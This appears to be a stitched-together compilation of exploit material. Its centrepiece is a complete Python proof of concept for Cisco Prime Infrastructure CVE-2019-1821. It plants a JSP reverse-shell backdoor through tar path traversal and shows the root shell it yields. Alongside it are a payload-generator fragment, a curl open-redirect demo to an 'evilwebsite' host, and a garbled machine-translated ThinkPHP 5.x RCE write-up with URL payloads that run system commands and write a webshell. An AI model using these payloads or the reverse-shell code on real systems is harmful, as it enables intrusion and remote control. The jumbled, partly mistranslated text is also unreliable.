p += 'T'
p += wn(0x13, 1)
p += wn(0x20)
p += wn(0x6)
p += 'E'
w += p
f = open("exploit", "w")
f.write(w)
f.close()
print '[+] Generated payload'
'''
Mortals represent immorality, clueless, they crush each other in an everlasting
pursuit to climb the ladder of social-status, greed is engraved in their nature,
they're materialistic, and the essence of their lives is money and wealth.
However, such definition is inaccurate as it doesn't apply to the minority.
I have discovered a truly marvelous proof of their existence, which this margin
is too narrow to contain.
- Alien599, not Fermat.
Greetings to Alien133, Alien610, Alien6068, Alien814, Alien641.
X
'''
#!/usr/bin/python
"""
Cisco Prime Infrastructure Health Monitor HA TarArchive Directory Traversal Remote Code Execution Vulnerability
Steven Seeley (mr_me) of Source Incite - 2019
SRC: SRC-2019-0034
CVE: CVE-2019-1821
Example:
========
saturn:~ mr_me$ ./poc.py
(+) usage: ./poc.py <target> <connectback:port>
(+) eg: ./poc.py 192.168.100.123 192.168.100.2:4444
saturn:~ mr_me$ ./poc.py 192.168.100.123 192.168.100.2:4444
(+) planted backdoor!
(+) starting handler on port 4444
(+) connection from 192.168.100.123
(+) pop thy shell!
python -c 'import pty; pty.spawn("/bin/bash")'
[prime@piconsole CSCOlumos]$ /opt/CSCOlumos/bin/runrshell '" && /bin/sh #'
/opt/CSCOlumos/bin/runrshell '" && /bin/sh #'
sh-4.1# /usr/bin/id
/usr/bin/id
uid=0(root) gid=0(root) groups=0(root),110(gadmin),201(xmpdba) context=system_u:system_r:unconfined_java_t:s0
sh-4.1# exit
exit
exit
[prime@piconsole CSCOlumos]$ exit
exit
exit
"""
import sys
import socket
import requests
import tarfile
import telnetlib
from threading import Thread
from cStringIO import StringIO
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
def _build_tar(ls, lp):
"""
build the tar archive without touching disk
"""
f = StringIO()
b = _get_jsp(ls, lp)
t = tarfile.TarInfo("../../opt/CSCOlumos/tomcat/webapps/ROOT/si.jsp")
t.size = len(b)
with tarfile.open(fileobj=f, mode="w") as tar:
tar.addfile(t, StringIO(b))
return f.getvalue()
def _get_jsp(ls, lp):
jsp = """<%@page import="java.lang.*"%>
<%@page import="java.util.*"%>
<%@page import="java.io.*"%>
<%@page import="java.net.*"%>
<%
class StreamConnector extends Thread
{
InputStream sv;
OutputStream tp;
StreamConnector( InputStream sv, OutputStream tp )
{
this.sv = sv;
this.tp = tp;
}
public void run()
{
BufferedReader za = null;
BufferedWriter hjr = null;
try
{
za = new BufferedReader( new InputStreamReader( this.sv ) );
hjr = new BufferedWriter( new OutputStreamWriter( this.tp ) );
char buffer[] = new char[8192];
int length;
while( ( length = za.read( buffer, 0, buffer.length ) ) > 0 )
{
hjr.write( buffer, 0, length );
hjr.flush();
}
} catch( Exception e ){}
try
{
if( za != null )
za.close();
if( hjr != null )
hjr.close();
} catch( Exception e ){}
}
}
try
{
String ShellPath = new String("/bin/sh");
Socket socket = new Socket("__IP__", __PORT__);
Process process = Runtime.getRuntime().exec( ShellPath );
( new StreamConnector( process.getInputStream(), socket.getOutputStream() ) ).start();
( new StreamConnector( socket.getInputStream(), process.getOutputStream() ) ).start();
} catch( Exception e ) {}
%>"""
return jsp.replace("__IP__", ls).replace("__PORT__", str(lp))
def handler(lp):
"""
This is the client handler, to catch the connectback
"""
print "(+) starting handler on port %d" % lp
t = telnetlib.Telnet()
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(("0.0.0.0", lp))
s.listen(1)
conn, addr = s.accept()
print "(+) connection from %s" % addr[0]
t.sock = conn
print "(+) pop thy shell!"
t.interact()
def exec_code(t, lp):
"""
This function threads the client handler and sends off the attacking payload
"""
handlerthr = Thread(target=handler, args=(lp,))
handlerthr.start()
r = requests.get("https://%s/si.jsp" % t, verify=False)
def we_can_upload(t, ls, lp):
"""
This is where we take advantage of the vulnerability
"""
td = _build_tar(ls, lp)
bd = {'files': ('si.tar', td)}
h = {
'Destination-Dir': 'tftpRoot',
'Compressed-Archive': "false",
'Primary-IP' : '127.0.0.1',
'Filecount' : "1",
'Filename': "si.tar",
'Filesize' : str(len(td)),
}
r = requests.post("https://%s:8082/servlet/UploadServlet" % t, headers=h, files=bd, verify=False)
if r.status_code == 200:
return True
return False
def main():
if len(sys.argv) != 3:
print "(+) usage: %s <target> <connectback:port>" % sys.argv[0]
print "(+) eg: %s 192.168.100.123 192.168.100.2:4444" % sys.argv[0]
sys.exit(-1)
t = sys.argv[1]
cb = sys.argv[2]
if not ":" in cb:
print "(+) using default connectback port 4444"
ls = cb
lp = 4444
else:
if not cb.split(":")[1].isdigit():
print "(-) %s is not a port number!" % cb.split(":")[1]
sys.exit(-1)
ls = cb.split(":")[0]
lp = int(cb.split(":")[1])
if we_can_upload(t, ls, lp):
print "(+) planted backdoor!"
exec_code(t, lp)
if __name__ == '__main__':
main()
EDB Download ~ https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47685.zip
Normal URLs like http://redirect.local/test will be forwared to https://redirect.local/test. But by using newlines (CVE 2019-10098), we can redirect somewhere else (i.e. to `https://redirect.local.evilwebsite.com`):
```
curl -Ik 'https://redirect.local/%0a.evilwebsite.com' --path-as-is
HTTP/2 302
date: Mon, 28 Oct 2019 03:36:58 GMT
content-type: text/html; charset=iso-8859-1
location: https://redirect.local.evilwebsite.com
```
0x00序文
ThinkPhpのオフィシャルは、2018年12月9日に重要なセキュリティアップデートをリリースし、深刻なリモートコード実行の脆弱性を修正しました。この更新には、主にセキュリティアップデートが含まれます。フレームワークはコントローラー名の十分な検出を実行しないため、強制ルーティングを有効にすることなく、ゲッシェルの脆弱性の可能性につながります。影響を受けるバージョンにはバージョン5.0と5.1が含まれており、できるだけ早く最新バージョンに更新することをお勧めします。
0x01衝撃の範囲
5.x 5.1.31、=5.0.23
0x02脆弱性分析
ThinkPhp v5.0.xパッチアドレス:3https://github.com/top-think/framework/commit/b797d72352e6b4eb0e11b6bc2a2ef25907b7756f
thinkphp v5.1.xパッチアドレス:3359github.com/top-think/framework/commit/802f284bec821a608e7543d91126abc5901b2815
ルーティング情報のコントローラーパーツはフィルタリングされており、ルーティングスケジューリング中に問題が発生することがわかります。
キーコード:
このプログラムは、修正前にコントローラーをフィルタリングせず、攻撃者は\シンボルを導入してクラスメソッドを呼び出しました。
$ this-app-controllerメソッドは、コントローラーをインスタンス化するために使用され、インスタンスのメソッドが呼び出されます。コントローラーメソッドのフォローアップ:
$モジュールと$クラスは、parsemoduleandclassメソッドを介して解析され、$ classがインスタンス化されます。
parsemoduleandclassメソッドでは、$ nameがBackslash \で始まると、クラス名として直接使用されます。名前空間を利用して、$ name(つまり、ルートのコントローラーパーツ)を制御できれば、任意のクラスをインスタンス化できます。
次に、ルーティングコードを振り返ります。ルート/ディスパッチ/url.php: parseurlメソッドコールルート/ルール。pathinfoのルーティング情報を解析するPhp: parseurlpath
コードは比較的単純で、フィルタリングなしで/セグメント$ URLを使用することです。
ルートURLはrequest:3360path()から取得されます
var_pathinfoのデフォルト構成はsであるため、$ _get ['s']を使用してルーティング情報を渡すことができます。ただし、テスト中に、$ _Server ['pathinfo'] \ in \ in \ in Windows環境に置き換えられます。以前の分析と組み合わせることで、次のように予備コードを取得できます:index.php?s=index/\ namespace \ class/method。
0x03エクスプロイト
Dockerの脆弱性環境ソースコード:https://Github.com/vulnspy/Thinkphp-5.1.29
ローカル環境:thinkphp5.0.15+php5.6n+apache2.0
http://www.thinkphp.cn/donate/download/id/1125.html
1.システム関数を使用して、リモートコマンドを実行します
http://LocalHost3:9096/public/index.php?s=index/think \ app/invokeFunctionFunction=call_user_func_arrayvars [0]=systemvars [1] []=whoami
2。phpinfo関数を介してphpinfo()の情報を書く
http://LocalHost3:9096/public/index.php?s=index/\ sink \ app/invokeFunctionFunction=call_user_func_arrayvars [0]=phpinfovars [1] []=1
3。Shell:に書き込みます
http://LOCALHOST:9096/public/index.php?s=/\ \ shink \ app/invokefunctionfunction=call_user_func_arrayvars [0]=systemvars [1] []=echo%20^%3c?php%20@ham
または
http://LocalHost3:9096/index.php?s=index/think \ app/invokeFunctionFunction=call_user_func_arrayvars [1] [] []=./test.phpvars []=?php echo 'ok'
